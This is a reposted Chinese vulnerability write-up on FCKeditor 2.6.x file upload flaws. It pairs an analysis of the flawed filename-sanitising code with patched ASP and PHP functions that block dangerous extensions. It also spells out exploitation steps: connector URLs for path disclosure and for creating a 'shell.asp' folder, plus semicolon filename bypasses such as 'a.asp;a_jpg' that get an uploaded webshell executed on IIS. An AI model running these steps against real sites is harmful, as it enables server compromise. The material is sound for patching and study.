碼上歡樂
相關內容    簡體    繁體

Fckeditor PHP/ASP File Upload Vul

本文轉載自   查看原文   2015-03-09 16:52   2954 

目錄

1. 漏洞描述
2. 漏洞觸發條件
3. 漏洞影響范圍
4. 漏洞代碼分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

FCKeditor是目前最優秀的可見即可得網頁編輯器之一,它采用JavaScript編寫。具備功能強大、配置容易、跨瀏覽器、支持多種編程語言、開源等特點。它非常流行,互聯網上很容易找到相關技術文檔,國內許多WEB項目和大型網站均采用了FCKeditor
它可和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的編程語言相結合
FCK中一個很重要的文件上傳的功能,常常被黑客用來進行GETSHELL攻擊,根本原因是因為角色權限控制不嚴、以及文件擴展名限制邏輯存在BYPASS缺陷

Relevant Link:

http://sebug.net/vuldb/ssvid-20830


2. 漏洞觸發條件

0x1: 信息搜集

首先收集FCK的版本信息

http://localhost/fckeditor/editor/dialog/fck_about.html
/*
version 
2.6.8
Build 25427
*/

0x2: 獲取上傳點路徑

爆物理路徑
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

1. 爆路徑漏洞
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

2. 列目錄漏洞也可助找上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3. 其他上傳地址
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
一般很多站點都已刪除_samples目錄,可以試試。
FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁
http://192.168.174.138/fckeditor/editor/fckeditor.html

4. 常用上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  

5. FCKeditor 中test 文件的上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html

最終獲得的上傳點如下

http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html

0x3: 建立新文件夾

http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
//在images文件夾下建立文件夾

0x4: IIS解析漏洞

如果你的文件處在一個xx.asp文件夾下,那這個文件夾下的所有文件都會被當作.asp腳本來執行,這是利用了IIS的xx.asp文件夾解析漏洞

1. 建立一個文件夾/z/shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

2. 上傳一個內容為WEBSHELL的xx.jpg文件
http://localhost/userfiles/image/shell.asp/z/choop.jpg
http://localhost/userfiles/image/shell.asp/z/choop.jpg
//這個xx.jpg會被當作webshell解析

0x5: FCK擴展名過濾防御解析漏洞

正常情況下,fck對上傳的文件后綴擴展名是有防御邏輯的(即禁止上傳腳本文件)

1. 上傳文件名: shell.php;.jpg
文件會被重命名為: shell_php.jpg

2. 如果上傳文件名: 
    1) a.php;a_jpg
    2) a.asp;a_jpg
則文件不會被重命名
 
3. 又因為IIS存在一個解析漏洞,分號";"后面的字符串會被IIS截斷,導致黑客上傳的文件對IIS來說就是
a.php
a.asp
從而得到執行

Relevant Link:

http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597


3. 漏洞影響范圍

2.6.xx


4. 漏洞代碼分析

FCKEditor上傳檢測,是通過黑色單/白名單的方式檢測允許和不允許上傳的文件類型,具體的實現邏輯位於

1. asp: \editor\filemanager\connectors\asp\io.asp
2. php: \editor\filemanager\connectors\php\io.php
//在另一個browser目錄中也存在同樣目錄結構的一套文件
3. asp: \editor\filemanager\browser\default\connectors\asp\io.asp
4. php: \editor\filemanager\browser\default\connectors\php\io.php

0x1: ASP

\fckeditor\editor\filemanager\connectors\asp\class_upload.asp

Private Function IsAllowed(sExt)
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = True
        oRE.Global        = True

        If sDenied = "" Then
            oRE.Pattern    = sAllowed
            IsAllowed    = (sAllowed = "") Or oRE.Test(sExt)
        Else
            oRE.Pattern    = sDenied
            IsAllowed    = Not oRE.Test(sExt)
        End If

        Set oRE    = Nothing
End Function

\fckeditor\editor\filemanager\connectors\asp\io.asp

Function IsAllowedExt( extension, resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True

    Dim sAllowed, sDenied
    sAllowed    = ConfigAllowedExtensions.Item( resourceType )
    sDenied        = ConfigDeniedExtensions.Item( resourceType )

    IsAllowedExt = True

    If sDenied <> "" Then
        oRE.Pattern    = sDenied
        IsAllowedExt    = Not oRE.Test( extension )
    End If

    If IsAllowedExt And sAllowed <> "" Then
        oRE.Pattern        = sAllowed
        IsAllowedExt    = oRE.Test( extension )
    End If

    Set oRE    = Nothing
End Function

待檢測的extension是來自FCK的配置文件:config.asp
\fckeditor\editor\filemanager\connectors\asp\config.asp

ConfigAllowedExtensions.Add    "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"

ConfigAllowedExtensions.Add    "Image", "bmp|gif|jpeg|jpg|png"

ConfigAllowedExtensions.Add    "Flash", "swf|flv"

ConfigAllowedExtensions.Add    "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"

這只是提供給FCK的正則判斷邏輯,真正的重命名機制在這里
\fckeditor\editor\filemanager\connectors\asp\io.asp

' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Set oRegex = New RegExp
    oRegex.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        /*
        這就是重命名文件名的關鍵邏輯了
        從第一個遇到"."號開始搜索,並把后面的內容當作捕獲分組,捕獲分組的過濾條件是不會再在后面遇到一個"."號 了,並設置一個斷言,斷言的內容為捕獲分組的內容不可能發生,即如果還在后面遇到了一個"."號,則這個正則判斷成立,即搜索到第一次遇到的"."號。然后進行replace操作,把"."號替換成"_"
        1. 如果我們的文件名是: asp.asp;asp.jpg,自然會被正則捕獲到,第一個"."號就被替換成了"_"
        2. 如果我們的文件名是: asp.asp;jpg,這種文件名也能通過文件后綴判斷邏輯,即bypass
        */
        oRegex.Pattern = "\.(?![^.]*$)"
        sNewFileName = oRegex.Replace( sNewFileName, "_" )
    end if

' remove \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function


5. 防御方法

1. ASP

0x1:  刪除fckeditor下含test的html文件

1. \editor\filemanager\connectors\test.html

0x2: 在代碼層防御IIS解析漏洞(分號截斷)

\editor\filemanager\connectors\asp\io.asp

' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        oRegex.Pattern = "\.(?![^.]*$)"
        SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

        oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
        SanitizeFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
    end if

' remove \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\\|\/|\||:|\;|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function

0x3: 在代碼層防御IIS解析漏洞(創建xx.asp目錄)
如果黑客通過FCK的目錄創建接口創建了一個xx.asp目錄,IIS將此目錄下的的任意文件都當作asp腳本進行解析,攻擊者可以向這個目錄下上傳包含WEBSHELL的jpg文件

' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    'remove . \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\.|\\|\/|\||:|\?|\;|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFolderName = oRegex.Replace( sNewFolderName, "_" )

    'forbidden the dangerous ext
    oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
    SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

    Set oRegex = Nothing
end function

0x4: 擴展名上傳限制正則繞過漏洞

和0x2: 在代碼層防御IIS解析漏洞(分號截斷)相同,同時還可以通過強化正則規則,在擴展名的頭尾加上"起始"、"結束"定界符來規避攻擊者的畸形后綴bypass

Function IsAllowedType( resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = False
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedTypes & ")$"

    IsAllowedType = oRE.Test( resourceType )

    Set oRE    = Nothing
End Function

Function IsAllowedCommand( sCommand )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedCommands & ")$"

    IsAllowedCommand = oRE.Test( sCommand )

    Set oRE    = Nothing
End Function

Relevant Link:

http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807

2. PHP

存在IIS+FastCGI即同時存在ASP、PHP的運行環境

/editor/filemanager/connectors/php/io.php

// Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
    $sNewFolderName = stripslashes( $sNewFolderName ) ;

    // Remove . \ / | : ; . ? * " < >
    $sNewFolderName = preg_replace( '/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;

    $sNewFolderName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;

    return $sNewFolderName ;
}

// Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
    global $Config ;

    $sNewFileName = stripslashes( $sNewFileName ) ;

    // Replace dots in the name with underscores (only one dot can be there... security issue).
    if ( $Config['ForceSingleExtension'] )
        $sNewFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sNewFileName ) ;

    // Remove \ / | : ? * " < >
    $sNewFileName = preg_replace( '/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;

    $sNewFileName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;

    return $sNewFileName ;
}


6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 兩種解決方法 PHP Warning: File upload error - unable to create a temporary file in Unknown jQuery File Upload的使用 DVWA--File Upload File Upload(文件上傳) jQuery-File-Upload fetch API & upload file 文件上傳漏洞(File Upload) dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php php5.6 上傳圖片error代碼為6 或者 報錯“PHP Warning: File upload error - unable to create a temporary file in Unknown on line 0”的解決辦法 DVWA 通關指南:File Upload(文件上傳)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM